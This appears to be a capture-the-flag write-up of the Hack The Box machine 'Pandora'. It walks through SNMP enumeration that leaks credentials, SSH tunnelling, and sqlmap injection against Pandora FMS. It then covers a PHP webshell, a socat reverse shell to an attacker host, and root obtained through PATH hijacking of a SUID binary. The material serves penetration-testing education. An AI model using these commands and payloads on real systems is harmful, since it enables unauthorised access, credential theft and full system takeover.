Pandora
Probably the hardest “easy” box i have done yet. Pandora makes use of a dynamic tunnel via SSH, which creates a proxy to view the hosted webpage. Pandora let me explore new tools, such as proxychains, allowing me to tunnel commands via proxy, and snmpwalk for enumerating snmp.
Recon
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root💀NTAKali)-[~/Desktop]
└─# nmap 10.10.11.136 -sV -sC -Pn -T 5
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-08 15:35 GMT
Warning: 10.10.11.136 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.136
Host is up (0.073s latency).
Not shown: 919 closed tcp ports (reset), 79 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.16 seconds
Port 80 is hosting a website called “Play”, an extension of panda.htb. Lets add this to our hosts file echo 10.10.11.136 panda.htb >> /etc/hosts
After looking through the website, i decided to see if the contact form had any vulnerabilities, but i seemed to hit a dead end so decided to search elsewhere.
UDP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root💀NTAKali)-[~/Desktop]
└─# nmap -sU --top-ports=20 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-09 10:18 GMT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.15s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp closed dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 15.58 seconds
With no success with the site on port 80, i decided to also do a UDP scan of the top 20 UDP ports. The scan showed port 161 open with snmp. Lets try and enumerate this further with nmap -sU -p 161 -sV -sC
└─# nmap -sU -sV -sC -p 161 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-09 10:22 GMT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.086s latency).
Bug in snmp-win32-software: no string output.
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 48fa95537765c36000000000
| snmpEngineBoots: 30
|_ snmpEngineTime: 1d21h25m23s
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_ System uptime: 1d21h25m24.02s (16352402 timeticks)
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 10.10.11.136:38132 1.1.1.1:53
| TCP 10.10.11.136:50496 10.10.14.8:1234
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
|_ UDP 127.0.0.53:53 *:*
| snmp-processes:
| 1:
| 2:
| 3:
| 4:
| 6:
| 9:
| 10:
| 11:
| 12:
| 13:
| 14:
| 15:
| 16:
| 17:
| 18:
| 20:
| 21:
| 22:
| 23:
| 24:
| 25:
| 26:
| 27:
| 28:
|_ 29:
Service Info: Host: pandora
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.06 seconds
The host is running SNMPv1, which is the oldest and original version of the SNMP protocol. SNMPv1’s biggest flaw is its use of a clear-text community string, which can be used to enumerate devices and information that otherwise should be encyrpted.
From the nmap scan, we can also see the community string public, and so we can use this to enumerate further, using snmpwalk.
SNMP
We can use the following command to enumerate SNMP snmpwalk -c public -v1 <IP>
Where -c sets the community string, in this case public, and -v1 sets the version to SNMPv1.
1
2
3
4
5
6
7
8
9
10
11
iso.3.6.1.2.1.25.4.2.1.5.873 = ""
iso.3.6.1.2.1.25.4.2.1.5.934 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.954 = ""
iso.3.6.1.2.1.25.4.2.1.5.971 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1098 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.27536 = ""
iso.3.6.1.2.1.25.4.2.1.5.33650 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.33652 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.34191 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.34210 = STRING: "-k start"
Near the bottom of the results, we can see what looks like credentials for user daniel, with the password HotelBabylon23.
We can use these to log into the system with SSH, as port 22 is open.
Foothold
Once SSH’d in daniels account, i looked for the user.txt flag, which is in the /matt directory. When attempting to access it, i am denied. Thus i must attempt to pivot into user matt.
1
2
daniel@pandora:/home/matt$ cat user.txt
cat: user.txt: Permission denied
Pivoting
Looking in the /var/www directory, i can see two directories, html and pandora. html is visible and accessible from a public host, but pandora is not. If i look at the /etc/hosts file on the system, we can see they have it setup this way:
1
2
3
4
5
6
7
8
9
10
daniel@pandora:~$ cat /etc/hosts
127.0.0.1 localhost.localdomain pandora.htb pandora.pandora.htb
127.0.1.1 pandora
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Assuming localhost.localdomain will allow access into the pandora directory, we can setup a dynamic tunnel using SSH. ssh -D 9999 daniel@panda.htb
When can then setup a proxy using FoxyProxy, using SOCKS5, which supports DNS resolution, to resolve the webpage on localhost.localdomain. 
From here we are greeted with the following Pandora FMS webpage:
Attempting to login with daniels credentials results in an error message saying only "User can only access API." From here i started to do some googling, which lead me to this website:
https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
This website details different vulnerabilities with Pandora FMS, but what stood out to me was the unauthenticaed SQL injection associated with **chart_generator.php** and session_id. I checked whether the chart_generator_php was there, and it was, but the error message “ACCESS IS NOT GRANTED” appeared.
ProxyChains
Knowing that i can access the vulnerable page, i will using sqlmap via proxychains. ProxyChains is a tool that forces any TCP connection made by any given application to go through proxies. Essentially, you can use ProxyChains to run any program through a proxy server.
First thing is to add the proxy we created to the proxy chains config. socks5 127.0.0.1 9999 daniel HotelBabylon23
1
2
3
4
5
6
7
8
pico /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 9999 daniel HotelBabylon23
I can now use sqlmap with proxychains on the Pandora FMS.
proxychains sqlmap -u http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id= --dbs
[21:21:12] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 20.04 or 19.10 (eoan or focal) web application technology: PHP, Apache 2.4.41 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [21:21:12] [INFO] fetching database names [proxychains] Strict chain ... 127.0.0.1:9999 ... localhost.localdomain:80 ... OK [21:21:12] [WARNING] reflective value(s) found and filtering out [proxychains] Strict chain ... 127.0.0.1:9999 ... localhost.localdomain:80 ... OK [21:21:13] [INFO] retrieved: 'information_schema' [proxychains] Strict chain ... 127.0.0.1:9999 ... localhost.localdomain:80 ... OK [21:21:13] [INFO] retrieved: 'pandora' available databases [2]: [*] information_schema [*] pandora
After enumering through the pandora database, i found 2 interesting tables, tpassword_history and tsessions_php.
Dumping the password history table gave me the md5 hashed passwords of Matt and Daniel. 
Dumping the sessions_php table gave me session id’s for both matt and daniel.
Awesome, now i can use Matts session_id cookie and login to his account.
Unfortunately, Matt is not an admin. However, using the following SQL injection line from sqlpwn.py gave me the admin cookie, to elevate to admin.
https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/blob/master/sqlpwn.py
### Webshell
Now i am able to upload files via the admin file manager.
After trying to upload a php reverse shell and getting no luck, i decided to upload a php webshell.
From here, i attempted to get a reverse shell with socat, which allows full TTY over shells.
###### Host
`socat file:tty,raw,echo=0 tcp-listen:4445`
###### Web Shell
`socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:<PORT>`
We have a reverse shell, nice!
## User
Moving to the matt directory, i can now access the user flag.
<pre>
matt@pandora:/home/matt$ cat user.txt
*30***b8557f5**be1160c*4be67c***
</pre>
## Priviledge Esculation
After some looking around, i noticed that i was in some sort of restricted environment. When typing `sudo`, i was presented with the following weird error message.
<pre>
matt@pandora:/home/matt$ sudo
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin
</pre>
From here, i looked for SUID binaries.
`find / -perm -u=s -type f 2>/dev/null`
<pre>
matt@pandora:/home/matt$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
</pre>
I checked some binaries on GTFObins, and found a possible shell escape using the `/usr/bin/at` binary.
echo “/bin/sh <$(tty) >$(tty) 2>$(tty)” | at now; tail -f /dev/null
1
2
3
4
5
6
7
8
9
10
11
Now when typing sudo, i am met with the normal functionality.
Another insteresting binary was `pandora_backup`. I downloaded it to my host machine, and run `strings` to see if there is any useful information i can see.
```bash
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
It looks as though the tar command it used to compress files in the root directory. However i noticed the call to tar does not use the full path, and so i can change to $PATH to a custom tar executable, possibly allowing for priviledge esculation.
1
2
3
4
5
cd /tmp
echo "/bin/bash" > tar
chmod +777 tar
export PATH:/tmp:$PATH
pandora_backup
After running, we gained root access and can get the last flag in the root directory.
Root
root@pandora:/root# cat root.txt **111*884f**818dfc628***4e5f*30d